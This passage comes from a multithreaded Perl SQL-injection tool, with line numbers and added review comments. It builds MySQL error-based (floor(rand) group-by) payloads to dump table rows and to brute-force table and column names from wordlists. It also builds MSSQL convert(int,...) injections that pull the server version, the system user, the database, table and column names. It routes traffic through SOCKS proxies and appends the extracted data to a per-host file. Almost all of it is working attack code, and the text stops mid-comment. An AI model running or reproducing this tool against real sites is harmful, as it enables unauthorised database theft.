              $num = -1; # shared LIMIT offset; first lock/++ makes it 0 -- do not change
         } else {
              print "Enter START_position: ";
              $choice1 = <STDIN>;
              chomp $choice1;
              # START-2 so the first lock/++ yields START-1, the 0-based offset.
              $num = $choice1-2;
              print "Enter END_position: ";
              $choice2 = <STDIN>;
              chomp $choice2;
              # Loop runs while $num < END-1, i.e. the last offset fetched is END-1.
              $column_name_p = $choice2-1;
              print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
         }
         print "-----------------------------------------\n";
         print "Request method - $method\n";
         print "Threads - $kol_threads\n";
         print "Proxy - $proxy_message\n";
         print "----------------------\n";
         ## end from2
         ## Fetch rows: one LIMIT offset per worker iteration ##
         for(0..$thr) {
             $trl[$_] = threads->create(\&gets114111);
         }
         for(0..$thr) {
             $trl[$_]->join;
         }
         # Worker (no condition): claim the next offset under lock and fetch
         # the selected columns joined by ':' (concat_ws(0x3a, ...)).
         # NOTE(review): the loop test reads $num outside the lock, so the
         # workers can overshoot $column_name_p by a few requests; FILE
         # output from different workers may interleave.
         sub gets114111 {
            $| = 1; # autoflush for the "\r" progress counter
            while ($num<$column_name_p) {
               { lock($num);
               $num++; }
      if($sql_flag == 0){
              $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
              $content = scan_url();
      } elsif ($sql_flag == 1) {#POST
              $current = $f_url;
              $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
              $content = scan_url_POST();
      } elsif($sql_flag == 2){#HEADER
              $current = $f_url;
              $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
              $sql_header_query =~ s!\Q$search!$replacement!g;
              $content = scan_url_HEADER();
      }
               # /s here: a value containing newlines is still captured.
               if ($content =~ m/ussr(.*?)ussr/imgs) {
                    print "   " . $1 . "\n";
                    print FILE "  "  . $1 . "\n";
               }
               print $num . "\r";
               sleep $pause; # per-request delay (configured elsewhere)
            $current="";
            $content="";
            $sql_post="";
            $sql_header_query="";

            }
         }
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE);
    goto START2001; # back to the main menu (label defined earlier in the file)
    } else {
    ## Same as above, with the user's "where" condition appended ##
         print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
      if($sql_flag == 0){
              $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url();
      } elsif ($sql_flag == 1) {#POST
              $current = $f_url;
              $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url_POST();
      } elsif($sql_flag == 2){#HEADER
              $current = $f_url;
              $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $sql_header_query =~ s!\Q$search!$replacement!g;
              $content = scan_url_HEADER();
      }
         $column_name_p = $content;
         $column_name_p =~ m/ussr(.*?)ussr/img;
         $column_name_p = $1; # matching row count; loop bound below (stale-$1 caveat)
            $current="";
            $content="";
            $sql_post="";
            $sql_header_query="";
         print "$column_name_p\n";
         print "----------\n";
         ## Choose full dump or a 1-based record range ##
         print "Get ALL data from " . $table_name . " with [ where " . $where . " ] (" . $column_name_p . ") ? (1/0): ";
         $choice = <STDIN>;
         chomp $choice;
         $thr = $kol_threads; # worker count ($kol_threads+1 are started)
         if ($choice == 1) {
              $num = -1; # shared LIMIT offset -- do not change
         } else {
              print "Enter START_position: ";
              $choice1 = <STDIN>;
              chomp $choice1;
              # START-2 so the first lock/++ yields the 0-based offset START-1.
              $num = $choice1-2;
              print "Enter END_position: ";
              $choice2 = <STDIN>;
              chomp $choice2;
              # Loop stops once offset END-1 has been fetched.
              $column_name_p = $choice2-1;
              print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
         }
         print "-----------------------------------------\n";
         print "Request method - $method\n";
         print "Threads - $kol_threads\n";
         print "Proxy - $proxy_message\n";
         print "----------------------\n";
         ## end from2
         for(0..$thr) {
             $trl[$_] = threads->create(\&gets115111);
         }
         for(0..$thr) {
             $trl[$_]->join;
         }
         # Worker (with condition): as gets114111 but with "where $where".
         # NOTE(review): unlike gets114111 the extraction below has no /s,
         # so a value containing a newline is not captured on this path.
         sub gets115111 {
            $| = 1; # autoflush for the "\r" progress counter
            while ($num<$column_name_p) {
               { lock($num);
               $num++; }
      if($sql_flag == 0){
              $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
              $content = scan_url();
      } elsif ($sql_flag == 1) {#POST
              $current = $f_url;
              $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
              $content = scan_url_POST();
      } elsif($sql_flag == 2){#HEADER
              $current = $f_url;
              $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "where" . $f_plus . $where . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
              $sql_header_query =~ s!\Q$search!$replacement!g;
              $content = scan_url_HEADER();
      }
               if ($content =~ m/ussr(.*?)ussr/img) {
                    print "   " . $1 . "\n";
                    print FILE "  "  . $1 . "\n";
               }
               print $num . "\r";
               sleep $pause; # per-request delay (configured elsewhere)
            $current="";
            $content="";
            $sql_post="";
            $sql_header_query="";

            }
         }
         print "----------\n";
         print "Saved in " . "z_" . $host . ".txt\n";
         close(FILE);
         goto START2001; # back to the main menu (label defined earlier in the file)
    }
}# end 4 -- menu item 7
  5265. # floor brute tables & columns mysql4
  5266. if ($choice == 8) {
  5267.    START2002:
  5268.    print "    [1] Brute table\n";
  5269.    print "    [2] Brute column\n";
  5270.    print "    [3] Main menu\n";
  5271.    print "----------\n";
  5272.    $choice = <STDIN>;
  5273.    chomp $choice;
  5274.    print "Your choice: $choice\n";
  5275.    $current = $f_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  5276.    print "Check version(): ";
  5277.    $content = scan_url();
  5278.    $ver = $content;
  5279.    $ver =~ m/ussr(.*?)ussr/img;
  5280.    $ver = $1;
  5281.    if ($ver) {
  5282.          print " $ver \n";
  5283.    } else {
  5284.          print " Can't get data \n";
  5285.          goto START2002;
  5286.    }
  5287.    print "-------------\n";
  5288.    if ($choice == 1) {
  5289.        open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  5290.        print "   Brute tables\n";
  5291.        print "   -------------\n";
  5292.        print FILE1 "   Brute tables\n";
  5293.        print FILE1 "   -------------\n";
  5294.        open(FILE, "<", $source_table_list);
  5295.        while(<FILE>) {
  5296.          chomp;
  5297.          push(@tables4, $_);
  5298.        }
  5299.        close(FILE);
  5300.        print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
  5301.        $choice = <STDIN>;
  5302.        chomp $choice;
  5303.        if ($choice == 1) {
  5304.               print "Enter your prefix for brute tables: ";
  5305.               $choice = <STDIN>;
  5306.               chomp $choice;
  5307.               $pref_brute = $choice;
  5308.        } else {
  5309.               $pref_brute = "";
  5310.        }
  5311.        $size = 0;
  5312.        $size = @tables4;
  5313.        print "File: $source_table_list\n";
  5314.        print "Tables: $size\n";
  5315.        print "-------------\n";
  5316.        print "Request method - $method\n";
  5317.        print "Threads - $kol_threads\n";
  5318.        print "Proxy - $proxy_message\n";
  5319.        print "----------------------\n";
  5320.        $thr = $kol_threads; # ???-?? ???????
  5321.        $num = -1; # ?? ????????
  5322.        for(0..$thr) {
  5323.             $trl[$_] = threads->create(\&gets6123);
  5324.        }
  5325.        for(0..$thr) {
  5326.             $trl[$_]->join;
  5327.        }
   sub gets6123 {
       # Worker body for the "Brute tables" mode.  The caller creates $kol_threads+1 threads
       # running this sub and joins them all.  $num is the threads::shared counter declared at
       # the top of the file and is the next index into @tables4; $size, $pref_brute, @tables4,
       # $pause and the FILE1 log handle are plain globals the caller set before the threads
       # were started (under ithreads each thread works on its own copy of the non-shared ones).
       $| = 1;   # autoflush STDOUT so the "\r" progress counter below shows up immediately
       while ($num<$size) {
          { lock($num);
          $num++; }
          # NOTE(review): $num is read again below after the lock has been released, so the
          # value used here is not guaranteed to be the one this worker just produced.  A worker
          # that passed the while-test still increments, so $num can reach $size and
          # $tables4[$num] is then undef, leaving a candidate that is just the prefix.
          $current1 = $pref_brute . $tables4[$num];   # candidate = optional prefix + one wordlist line
          # One request per candidate; a response containing the ussr...ussr marker counts as a
          # hit (the marker is presumably supplied by $sql_pref1/$sql_pref2, defined elsewhere).
          $current = $f_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $num . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $current1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $current1 . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
          $content = scan_url();   # presumably issues the request for the global $current — confirm
          if ($content =~ m/ussr(.*?)ussr/img) {
               print "   ---> " . $current1 . "\n";
               print FILE1 "  "  . $current1 . "\n";   # caller's append-mode "z_<host>.txt" log; all workers write it without a lock
          }
          print $num . "\r";
          sleep $pause;       # inter-request delay (global, set elsewhere)

       }
   }
  5345.        print "----------\n";
  5346.        print "Saved in " . "z_" . $host . ".txt\n";
  5347.        close(FILE1);
  5348.        goto START2002;
  5349.    }
  5350.    if ($choice == 2) {
  5351.          open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  5352.          print "   Brute columns\n";
  5353.          print "   -------------\n";
  5354.          print FILE1 "   Brute columns\n";
  5355.          print FILE1 "   -------------\n";
  5356.          print "Enter the table_name for brute: \n";
  5357.          $choice = <STDIN>;
  5358.          chomp $choice;
  5359.          $table = $choice;
  5360.          print "Brute columns for table [ " . $table . " ]\n";
  5361.          print "-------------\n";
  5362.          print "   Check table exist: ";
  5363.          $current = $f_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2 . $f_plus . "from" . $f_plus . $table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  5364.          $content = scan_url();
  5365.          $ver =$content;
  5366.          $ver =~ m/ussr(.*?)ussr/img;
  5367.          $ver = $1;
  5368.          if ($ver) {
  5369.              print " Ok \n";
  5370.          } else {
  5371.              print " No such table... \n";
  5372.              goto START2002;
  5373.          }
  5374.          open(FILE, "<", $source_column_list);
  5375.          while(<FILE>) {
  5376.             chomp;
  5377.             push(@columns4, $_);
  5378.          }
  5379.          close(FILE);
  5380.        print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
  5381.        $choice = <STDIN>;
  5382.        chomp $choice;
  5383.        if ($choice == 1) {
  5384.               print "Enter your prefix for brute columns: ";
  5385.               $choice = <STDIN>;
  5386.               chomp $choice;
  5387.               $pref_brute = $choice;
  5388.        } else {
  5389.               $pref_brute = "";
  5390.        }
  5391.          $size = 0;
  5392.          $size = @columns4;
  5393.          print "-------------\n";
  5394.          print "File: $source_column_list\n";
  5395.          print "Columns: $size\n";
  5396.          print "-------------\n";
  5397.          print "Request method - $method\n";
  5398.          print "Threads - $kol_threads\n";
  5399.          print "Proxy - $proxy_message\n";
  5400.          print "----------------------\n";
  5401.          $thr = $kol_threads; # ???-?? ???????
  5402.        $num = -1; # ?? ????????
  5403.        for(0..$thr) {
  5404.             $trl[$_] = threads->create(\&gets7123);
  5405.        }
  5406.        for(0..$thr) {
  5407.             $trl[$_]->join;
  5408.        }
   sub gets7123 {
       # Worker body for the "Brute columns" mode; the caller starts $kol_threads+1 of these and
       # joins them.  $num (threads::shared, declared at the top of the file) is the next index
       # into @columns4.  $size, $pref_brute, @columns4, $table, $pause and the FILE1 log handle
       # are plain globals set by the caller: $table is the table name typed at the prompt and
       # is placed into the request verbatim; @columns4 holds the lines of $source_column_list.
       $| = 1;   # autoflush STDOUT for the "\r" progress counter
       while ($num<$size) {
          { lock($num);
          $num++; }
          # NOTE(review): $num is re-read here after the lock is released, and a worker that
          # passed the while-test still increments, so $columns4[$num] can be undef (the
          # candidate is then just the prefix).
          $current1 = $pref_brute . $columns4[$num];   # candidate column name
          # One request per candidate; a response containing the ussr...ussr marker is a hit
          # (the marker presumably comes from $sql_pref1/$sql_pref2, defined elsewhere).
          $current = $f_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat_ws(0x3a," . $current1 . ")" . $sql_pref2 . $f_plus . "from" . $f_plus . $table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
          $content = scan_url();   # presumably issues the request for the global $current — confirm
          if ($content =~ m/ussr(.*?)ussr/img) {
               print "   ---> " . $current1 . "\n";
               print FILE1 "  "  . $current1 . "\n";   # caller's append-mode "z_<host>.txt" log, written by all workers
          }
          print $num . "\r";
          sleep $pause;       # inter-request delay (global, set elsewhere)

       }
   }
  5426.        print "----------\n";
  5427.        print "Saved in " . "z_" . $host . ".txt\n";
  5428.        close(FILE1);
  5429.        goto START2002;
  5430.    }
  5431.    if ($choice == 3) {
  5432.        goto START_global;
  5433.    }
  5434. }
  5435. if ($choice == 9) {goto START}
  5436. } #end floor(rand)
  5437. #########################################################
  5438. if ($choice == 14) {goto START_global}
  5439. }
  5440. ## end MYSQL ##########################################################################################################
  5441. ## MSSQL ##
  5442. if ($choice == 2) {
  5443. START_mssql:
  5444. if ($ms_url =~ m/^https:\/\/?([^\/]+)/i) {
  5445.    $host7 = $1;
  5446.    $https_flag = 1;
  5447.    print "----------------------\n";
  5448.    print "HTTPS mode enabled\n";
  5449.    print "----------------------\n";
  5450. }
  5451. $host = $host7;
  5452. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  5453.     print "-----------------------------------------\n";
  5454.     print "Authorization required, wait please....";
  5455.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  5456.     $ck1 = collect($answ1);
  5457.     $https_auth_check = 1;
  5458.     print " DONE\n";
  5459.     print "-----------------------------------------\n";
  5460. }
  5461. if ($use_socks == 1 && $socks_check == 0) {
  5462.   $check_url = $host;
  5463.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  5464.            . "Host: $check_host\r\n"
  5465.            . "Referer: http://" . $check_url . "\r\n"
  5466.            . "Accept: */*\r\n"
  5467.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  5468.            . "Connection: close\r\n\r\n";
  5469.    print "----------------------------------------\n";
  5470.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  5471.    print "Timeout = 5 sec:\n";
  5472.    print "----------------------------------------\n";
  5473.    $socks_check = 0;
  5474.    $check_socks = socks_check();
  5475.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  5476.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  5477.   if ($current_proxy_host) {
  5478.      $socks_check = 1;
  5479.      print "Will use --> $proxy_message\n";
  5480.   } else {
  5481.      $socks_check = 0;
  5482.      $proxy_message = "No";
  5483.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  5484.   }
  5485. }
  5486. sub char($) {
  5487.          $str1=$_[0];
  5488.          $aa="";$bb="";
  5489.          for ($i = 0; $i<length($str1); $i++ ) {
  5490.              $aa =  ord(substr($str1,$i,1));
  5491.              if ( $i == 0 ) {$bb= "char(" . $aa . ")";} else { $bb= $bb. "%2bchar(" . $aa . ")" ;}
  5492.          }
  5493.          return "$bb";
  5494. }
  5495. print "----------------------------------------------------------\n";
  5496. print "               Choose mode:\n";
  5497. print "----------------------------------------------------------\n";
  5498. print "    [1] MSSQL inj system information\n";
  5499. print "    [2] MSSQL inj get tables from information_schema (current DB)\n";
  5500. print "    [3] MSSQL inj get column_name from table (current DB)\n";
  5501. print "    [4] MSSQL inj get data from columns\n";
  5502. print "----------------------------------------------------------\n";
  5503. print "    [5]  Main menu\n";
  5504. print "----------------------------------------------------------\n";
  5505. $choice = <STDIN>;
  5506. chomp $choice;
  5507. print "Your choice: $choice\n";
  5508. if ($choice == 1) {
  5509.   $host = $host7;
  5510.   open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  5511.      if ($ms_convert_in == 0) {
  5512.          #$url1 = $ms_url . "(select" . $ms_spase . '@@version)' . $ms_close;
  5513.          $url1 = $ms_url . '@@version' . $ms_close;
  5514.      } else {
  5515.          $url1 = $ms_url . 'convert(int,@@version)' . $ms_close;
  5516.      }
  5517.      if ($ms_convert_in == 0) {
  5518.         $url2 = $ms_url . "(SeLect" . $ms_spase . "system_user)" . $ms_close;
  5519.      } else {
  5520.         $url2 = $ms_url . "convert(int,system_user)" . $ms_close;
  5521.      }
  5522.      if ($ms_convert_in == 0) {
  5523.         $url3 = $ms_url . "(SeLect" . $ms_spase . "db_name())" . $ms_close;
  5524.      } else {
  5525.         $url3 = $ms_url . "convert(int,db_name())" . $ms_close;
  5526.      }
  5527.      @array = ($url1,$url2,$url3);
  5528.      $size = @array; #???????? ?????? ???????
  5529.      $thr = $kol_threads; # ???-?? ???????
  5530.      $num = -1; # ?? ????????
  5531.      print "-----------------------------------------\n";
  5532.      print "System information:\n";
  5533.      print "-----------------------------------------\n";
  5534.      print FILE  "-----------------------------------------\n";
  5535.      print FILE  "HOST: $host\n";
  5536.      print FILE "-----------------------------------------\n";
  5537.      print FILE "System information:\n";
  5538.      print FILE "-----------------------------------------\n";
  5539.      print "Request method - $method\n";
  5540.      print "Threads - $kol_threads\n";
  5541.      print "Proxy - $proxy_message\n";
  5542.      print "----------------------\n";
  5543.      for(0..$thr) {
  5544.         $trl[$_] = threads->create(\&gets666);
  5545.      }
  5546.      for(0..$thr) {
  5547.         $trl[$_]->join;
  5548.      }
   sub gets666 {
       # Worker body for MSSQL "system information".  @array holds the three request URLs the
       # caller built (@@version, system_user, db_name()), $size is its length and $num
       # (threads::shared) is the next index; the caller starts $kol_threads+1 workers, so most
       # of them find nothing left to do.  FILE is the caller's append-mode log handle.
       $| = 1;   # autoflush STDOUT for the "\r" progress counter
       while ($num<$size) {
           { lock($num);
           $num++; }
           # NOTE(review): $num is read again after the lock is released; if it has already
           # moved past 2, $array[$num] is undef and $mess keeps whatever label it had before.
           $current = $array[$num];
           if ($num == 0) {$mess = '@@version: '}
           if ($num == 1) {$mess = "system_user: "}
           if ($num == 2) {$mess = "db_name(): "}
           $content = scan_url();   # presumably issues the request for the global $current — confirm
           # $1 comes from whichever of the two patterns matched; both are globals defined
           # outside this excerpt.
           if ($content =~ m/$ms_pattern_sys_tab/imgs or $content =~ m/$ms_pattern_sys_tab1/imgs) {
                 print $mess . $1 . "\n";
                 print FILE $mess . $1 . "\n";
           }
           print $num . "\r";
           sleep $pause;       # inter-request delay (global, set elsewhere)
       }
   }
  5567.      print "----------\n";
  5568.      print "Saved in " . "z_" . $host . ".txt\n";
  5569.      close(FILE);
  5570.      goto START_mssql;
  5571. }
  5572. if ($choice == 2) {
  5573.      $host = $host7;
  5574.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  5575.      print FILE "=============================================" . "\n";
  5576.      print FILE "Tables in information_schema:" . "\n";
  5577.      print FILE "=============================================" . "\n";
  5578.      print "-----------------------------------------\n";
  5579.      print "Request method - $method\n";
  5580.      print "Threads - $kol_threads\n";
  5581.      print "Proxy - $proxy_message\n";
  5582.      print "----------------------\n";
  5583.      ## ???-?? ?????? ? in_sch.tables
  5584.      $current = $ms_url . "convert(int,(SeLeCT" . $ms_spase . "mid(char(39)%2bchar(94)%2bchar(39)%2BCAST(COUNT(*)%20AS%20varchar),1,1000)" . $ms_spase . "FROM". $ms_spase . "INfORmATION_ScHEMA.TaBLeS))" . $ms_close;
  5585.        $content = scan_url();
  5586.      $column_name_p1 = $content;
  5587.      if ($column_name_p1 =~ m/$ms_pattern_data1/imgs || $column_name_p1 =~ m/$ms_pattern_data2/imgs || $column_name_p1 =~ m/$ms_pattern_data3/imgs) {
  5588.         ($a,$column_name_p) = split(/\'\^\'/, $1);
  5589.      }
  5590.      $column_name_p=10;
  5591.      print "Tables in information_schema.tables - $column_name_p\n";
  5592.      print "------------------------------------------------------\n";
  5593.      $thr = $kol_threads; # ???-?? ???????
  5594.      $num = -1; # ?? ????????
  5595.      for(0..$thr) {
  5596.           $trl[$_] = threads->create(\&gets691);
  5597.      }
  5598.      for(0..$thr) {
  5599.           $trl[$_]->join;
  5600.      }
   sub gets691 {
       # Worker body for MSSQL "get tables from information_schema".  $num (threads::shared)
       # is the row offset; the loop runs while it is below $column_name_p, the row count the
       # caller set.  $ms_url/$ms_spase/$ms_close/$ms_convert_in and the three $ms_pattern_data*
       # regexes are globals defined outside this excerpt; FILE is the caller's append-mode log.
       $| = 1;   # autoflush STDOUT for the "\r" progress counter
       while ($num < $column_name_p) {
          { lock($num);
          $num++; }
          $i = $num;   # NOTE(review): re-read after the lock is released; per-thread copy under ithreads
          # Two request shapes, chosen by the $ms_convert_in setting; $i is the number of rows skipped.
          if ($ms_convert_in == 0) {
                $current = $ms_url . "(SeLect" . $ms_spase . "max(table_name)" . $ms_spase . "from" . $ms_spase ."(select". $ms_spase ."top". $ms_spase ."1". $ms_spase ."table_name". $ms_spase ."from". $ms_spase ."information_schema.tables". $ms_spase ."where". $ms_spase ."table_name". $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . "table_name". $ms_spase ."from". $ms_spase ."information_schema.tables". $ms_spase ."order". $ms_spase . "by". $ms_spase ."table_name)". $ms_spase ."order". $ms_spase ."by". $ms_spase ."table_name)a)" . $ms_close;
                print FILE "  "  . $current . "\n";

          } else {
                $current = $ms_url . "convert(int,(select" . $ms_spase . "max(table_name)" . $ms_spase . "from" . $ms_spase . "(select". $ms_spase ."top". $ms_spase ."1". $ms_spase ."table_name". $ms_spase ."from". $ms_spase ."information_schema.tables". $ms_spase ."where". $ms_spase ."table_name". $ms_spase ."not". $ms_spase ."in". $ms_spase ."(select". $ms_spase ."top". $ms_spase . $i . $ms_spase . "table_name". $ms_spase ."from". $ms_spase ."information_schema.tables". $ms_spase ."order". $ms_spase . "by". $ms_spase ."table_name)". $ms_spase ."order". $ms_spase ."by". $ms_spase ."table_name)a))"  . $ms_close;
                print FILE "  "  . $current . "\n";

          }
          # NOTE(review): the full request URL was already written to FILE inside each branch
          # above, so this line logs every request twice; the in-branch prints read like
          # debugging leftovers (the column-listing worker gets692 has the equivalent
          # post-match line commented out).
          print FILE "  "  . $current . "\n";
          $content = scan_url();   # presumably issues the request for the global $current — confirm
          if ($content =~ m/$ms_pattern_data1/imgs || $content =~ m/$ms_pattern_data2/imgs || $content =~ m/$ms_pattern_data3/imgs) {

               print "   " . $1 . "\n";    # $1 is from whichever alternative matched
               print FILE "  "  . $1 . "\n";
          }
          print $num . "\r";
          sleep $pause;       # inter-request delay (global, set elsewhere)

       }
   }
  5628.      print "----------\n";
  5629.      print "Saved in " . "z_" . $host . ".txt\n";
  5630.      close(FILE);
  5631.      goto START_mssql;
  5632. }
  5633. if ($choice == 3) {
  5634.      $host = $host7;
  5635.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  5636.      print "-----------------------------------------\n";
  5637.      print "Enter the table_name: ";
  5638.      $choice1 = <STDIN>;
  5639.      chomp $choice1;
  5640.      $table = $choice1;
  5641.      print "Table: $choice1\n";
  5642.      print "----------\n";
  5643.      print FILE  "-----------------------------------------\n";
  5644.      print FILE  "Columns from table [ $choice1 ]\n";
  5645.      print FILE  "-----------------------------------------\n";
  5646.      print "Get columns from " . $choice1 .  ":\n";
  5647.      print "------------------------------------------------\n";
  5648.      $table = char($choice1);
  5649.      print "-----------------------------------------\n";
  5650.      print "Request method - $method\n";
  5651.      print "Threads - $kol_threads\n";
  5652.      print "Proxy - $proxy_message\n";
  5653.      print "----------------------\n";
  5654.      ## ???-?? ??????? ? in_sch.columns
  5655.      $current = $ms_url . "convert(int,(SELECT" . $ms_spase . "mid(char(39)%2bchar(94)%2bchar(39)%2BCAST(COUNT(*)%20AS%20varchar),1,1000)" . $ms_spase . "FROM". $ms_spase . "INFORMATION_SCHEMA.columns" . $ms_spase . "where" . $ms_spase . "table_name=" . $table . "))" . $ms_close;
  5656.      $content = scan_url();
  5657.      $column_name_p1 = $content;
  5658.      if ($column_name_p1 =~ m/$ms_pattern_data1/imgs || $column_name_p1 =~ m/$ms_pattern_data2/imgs || $column_name_p1 =~ m/$ms_pattern_data3/imgs) {
  5659.         ($a,$column_name_p) = split(/\'\^\'/, $1);
  5660.      }
  5661.      print "Columns in $choice1 - $column_name_p\n";
  5662.      print "------------------------------------------------------\n";
  5663.      $thr = $kol_threads; # ???-?? ???????
  5664.      $num = -1; # ?? ????????
  5665.      $sms = 0;
  5666.      $column_temp_ms = "";
  5667.      for(0..$thr) {
  5668.           $trl[$_] = threads->create(\&gets692);
  5669.      }
  5670.      for(0..$thr) {
  5671.           $trl[$_]->join;
  5672.      }
   sub gets692 {
       # Worker body for MSSQL "get column_name from table".  $num (threads::shared) is the row
       # offset, bounded by $column_name_p (the column count the caller obtained).  $table is the
       # char()-encoded table name the caller built from the prompt input; $ms_url/$ms_spase/
       # $ms_close/$ms_convert_in and the $ms_pattern_data* regexes are globals defined outside
       # this excerpt; FILE is the caller's append-mode log.
       $| = 1;   # autoflush STDOUT for the "\r" progress counter
       while ($num < $column_name_p) {
          { lock($num);
          $num++; }
          $i = $num;   # NOTE(review): re-read after the lock is released; per-thread copy under ithreads
          # Two request shapes, chosen by $ms_convert_in; $i is the number of rows skipped.
          # NOTE(review): both branches write the full request URL to FILE, while the same line
          # after the match below is commented out — looks like a debugging leftover that puts
